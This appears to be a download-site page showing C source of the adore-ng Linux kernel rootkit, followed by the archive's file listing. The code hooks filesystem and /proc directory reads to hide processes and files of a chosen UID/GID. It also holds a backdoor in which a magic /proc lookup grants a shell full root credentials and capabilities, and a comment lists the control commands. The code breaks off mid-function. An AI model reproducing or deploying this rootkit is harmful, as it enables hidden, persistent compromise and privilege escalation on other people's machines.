/*** (C) 2004-2005 by Stealth
***
*** http://stealth.scorpions.net/rootkits
*** http://stealth.openwall.net/rootkits
***
***
*** (C)'ed Under a BSDish license. Please look at LICENSE-file.
*** SO YOU USE THIS AT YOUR OWN RISK!
*** YOU ARE ONLY ALLOWED TO USE THIS IN LEGAL MANNERS.
*** !!! FOR EDUCATIONAL PURPOSES ONLY !!!
***
*** -> Use ava to get all the things workin'.
***
***/
#define __KERNEL__
#define MODULE
#ifdef MODVERSIONS
#include <linux/modversions.h>
#endif
#include <linux/sched.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/string.h>
#include <linux/fs.h>
#include <linux/file.h>
#include <linux/mount.h>
#include <linux/proc_fs.h>
#include <linux/capability.h>
#include <linux/net.h>
#include <linux/skbuff.h>
#include <linux/spinlock.h>
#include <net/sock.h>
#include <linux/un.h>
#include <net/af_unix.h>
#include "adore-ng.h"
char *proc_fs = "/proc"; /* default proc FS to hide processes */
MODULE_PARM(proc_fs, "s");
char *root_fs = "/"; /* default FS to hide files */
MODULE_PARM(root_fs, "s");
char *opt_fs = NULL;
MODULE_PARM(opt_fs, "s");
typedef int (*readdir_t)(struct file *, void *, filldir_t);
readdir_t orig_root_readdir = NULL, orig_opt_readdir = NULL,
orig_proc_readdir = NULL;
struct dentry *(*orig_proc_lookup)(struct inode *, struct dentry *) = NULL;
int cleanup_module();
static int tcp_new_size();
static int (*o_get_info_tcp)(char *, char **, off_t, int);
extern struct socket *sockfd_lookup(int fd, int *err);
extern __inline__ void sockfd_put(struct socket *sock)
{
fput(sock->file);
}
#ifndef PID_MAX
#define PID_MAX 0x8000
#endif
static char hidden_procs[PID_MAX/8+1];
inline void hide_proc(pid_t x)
{
if (x >= PID_MAX || x == 1)
return;
hidden_procs[x/8] |= 1<<(x%8);
}
inline void unhide_proc(pid_t x)
{
if (x >= PID_MAX)
return;
hidden_procs[x/8] &= ~(1<<(x%8));
}
inline char is_invisible(pid_t x)
{
if (x >= PID_MAX)
return 0;
return hidden_procs[x/8]&(1<<(x%8));
}
/* Theres some crap after the PID-filename on proc
* getdents() so the semantics of this function changed:
* Make "672" -> 672 and
* "672|@\" -> 672 too
*/
int adore_atoi(const char *str)
{
int ret = 0, mul = 1;
const char *ptr;
for (ptr = str; *ptr >= '0' && *ptr <= '9'; ptr++)
;
ptr--;
while (ptr >= str) {
if (*ptr < '0' || *ptr > '9')
break;
ret += (*ptr - '0') * mul;
mul *= 10;
ptr--;
}
return ret;
}
/* Own implementation of find_task_by_pid() */
struct task_struct *adore_find_task(pid_t pid)
{
struct task_struct *p;
read_lock(&tasklist_lock); // XXX: locking necessary?
for_each_task(p) {
if (p->pid == pid) {
read_unlock(&tasklist_lock);
return p;
}
}
read_unlock(&tasklist_lock);
return NULL;
}
int should_be_hidden(pid_t pid)
{
struct task_struct *p = NULL;
if (is_invisible(pid)) {
return 1;
}
p = adore_find_task(pid);
if (!p)
return 0;
/* If the parent is hidden, we are hidden too XXX */
task_lock(p);
#ifdef REDHAT9
if (is_invisible(p->parent->pid)) {
#else
if (is_invisible(p->p_pptr->pid)) {
#endif
task_unlock(p);
hide_proc(pid);
return 1;
}
task_unlock(p);
return 0;
}
/* You can control adore-ng without ava too:
*
* echo > /proc/<ADORE_KEY> will make the shell authenticated,
* cat /proc/hide-<PID> from such a shell will hide PID,
* cat /proc/unhide-<PID> will unhide the process
* cat /proc/uninstall will uninstall adore
*/
struct dentry *adore_lookup(struct inode *i, struct dentry *d)
{
task_lock(current);
if (strncmp(ADORE_KEY, d->d_iname, strlen(ADORE_KEY)) == 0) {
current->flags |= PF_AUTH;
current->suid = ADORE_VERSION;
} else if ((current->flags & PF_AUTH) &&
strncmp(d->d_iname, "fullprivs", 9) == 0) {
current->uid = 0;
current->suid = 0;
current->euid = 0;
current->gid = 0;
current->egid = 0;
current->fsuid = 0;
current->fsgid = 0;
cap_set_full(current->cap_effective);
cap_set_full(current->cap_inheritable);
cap_set_full(current->cap_permitted);
} else if ((current->flags & PF_AUTH) &&
strncmp(d->d_iname, "hide-", 5) == 0) {
hide_proc(adore_atoi(d->d_iname+5));
} else if ((current->flags & PF_AUTH) &&
strncmp(d->d_iname, "unhide-", 7) == 0) {
unhide_proc(adore_atoi(d->d_iname+7));
} else if ((current->flags & PF_AUTH) &&
strncmp(d->d_iname, "uninstall", 9) == 0) {
cleanup_module();
}
task_unlock(current);
if (should_be_hidden(adore_atoi(d->d_iname)) &&
/* A hidden ps must be able to see itself! */
!should_be_hidden(current->pid))
return NULL;
return orig_proc_lookup(i, d);
}
filldir_t proc_filldir = NULL;
spinlock_t proc_filldir_lock = SPIN_LOCK_UNLOCKED;
int adore_proc_filldir(void *buf, const char *name, int nlen, loff_t off, ino_t ino, unsigned x)
{
if (should_be_hidden(adore_atoi(name)))
return 0;
return proc_filldir(buf, name, nlen, off, ino, x);
}
int adore_proc_readdir(struct file *fp, void *buf, filldir_t filldir)
{
int r = 0;
spin_lock(&proc_filldir_lock);
proc_filldir = filldir;
r = orig_proc_readdir(fp, buf, adore_proc_filldir);
spin_unlock(&proc_filldir_lock);
return r;
}
filldir_t opt_filldir = NULL;
struct super_block *opt_sb[1024];
int adore_opt_filldir(void *buf, const char *name, int nlen, loff_t off, ino_t ino, unsigned x)
{
struct inode *inode = NULL;
int r = 0;
uid_t uid;
gid_t gid;
if ((inode = iget(opt_sb[current->pid % 1024], ino)) == NULL)
return 0;
uid = inode->i_uid;
gid = inode->i_gid;
iput(inode);
/* Is it hidden ? */
if (uid == ELITE_UID && gid == ELITE_GID) {
r = 0;
} else
r = opt_filldir(buf, name, nlen, off, ino, x);
return r;
}
int adore_opt_readdir(struct file *fp, void *buf, filldir_t filldir)
{
int r = 0;
if (!fp || !fp->f_vfsmnt)
return 0;
opt_filldir = filldir;
opt_sb[current->pid % 1024] = fp->f_vfsmnt->mnt_sb;
r = orig_opt_readdir(fp, buf, adore_opt_filldir);
return r;
}
/* About the locking of these global vars:
* I used to lock these via rwlocks but on SMP systems this can cause
* a deadlock because the iget() locks an inode itself and I guess this
* could cause a locking situation of AB BA. So, I do not lock root_sb and
* root_filldir (same with opt_) anymore. root_filldir should anyway always
* be the same (filldir64 or filldir, depending on the libc). The worst thing that
* could happen is that 2 processes call filldir where the 2nd is replacing
* root_sb which affects the 1st process which AT WORST CASE shows the hidden files.
* Following conditions have to be met then: 1. SMP 2. 2 processes calling getdents()
* on 2 different partitions with the same FS.
* Now, since I made an array of super_blocks it must also be that the PIDs of
* these procs have to be the same PID modulo 1024. This sitation (all 3 cases must
* be met) should be very very rare.
*/
filldir_t root_filldir = NULL;
struct super_block *root_sb[1024];
int adore_root_filldir(void *buf, const char *name, int nlen, loff_t off, ino_t ino, unsigned x)
{
struct inode *inode = NULL;
int r = 0;
uid_t uid;
gid_t gid;
if ((inode = iget(root_sb[current->pid % 1024], ino)) == NULL)
return 0;
uid = inode->i_uid;
gid = inode->i_gid;
iput(inode);
/* Is it hidden ? */
if (uid == ELITE_UID && gid == ELITE_GID) {
r = 0;
} else
r = root_filldir(buf, name, nlen, off, ino, x);
return r;
}
int adore_root_readdir(struct file *fp, void *buf, filldir_t filldir)
{
int r = 0;
if (!fp || !fp->f_vfsmnt)
return 0;
root_filldir = filldir;
root_sb[current->pid % 1024] = fp->f_vfsmnt->mnt_sb;
r = orig_root_readdir(fp, buf, adore_root_filldir);
return r;
}
int patch_vfs(const char *p, readdir_t *orig_readdir, readdir_t new_readdir)
{
struct file *filep;
filep = filp_open(p, O_RDONLY, 0);
if (IS_ERR(filep))
return -1;
if (orig_readdir)
*orig_readdir = filep->f_op->readdir;
filep->f_op->readdir = new_readdir;
filp_close(filep, 0);
return 0;
}
int unpatch_vfs(const char *p, readdir_t orig_readdir)
没有合适的资源?快使用搜索试试~ 我知道了~
资源推荐
资源详情
资源评论
收起资源包目录
adore-ng-056-wztfix.rar (35个子文件)
adore-ng-0.56-wztfix
adore-ng-2.6.c 12KB
visible-start.c 454B
README.26 2KB
Changelog 4KB
.adore-ng-2.6.mod.o.cmd 13KB
Makefile.gen 747B
cleaner.c 2KB
irq_vectors.h 198B
FEATURES 1KB
libinvisible.h 2KB
.adore-ng-2.6.o.cmd 19KB
relink26 1KB
ava.c 5KB
symsed 6KB
.tmp_versions
adore-ng-2.6.mod 97B
.adore-ng-2.6.ko.cmd 238B
configure 4KB
LICENSE 2KB
adore-ng.mod.c 324B
Makefile.2.6 1KB
Makefile 1KB
adore-ng-2.6.c~ 13KB
CVS
Root 5B
Tag 10B
Repository 9B
Entries 1KB
startadore 218B
adore-ng.h 1KB
adore-ng-2.6.mod.c 905B
libinvisible.c 4KB
adore-ng.c 14KB
README 6KB
Makefile.2.6.gen 760B
symsed.c 1KB
Module.symvers 0B
共 35 条
- 1
资源评论
a1561649415
- 粉丝: 0
- 资源: 6
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功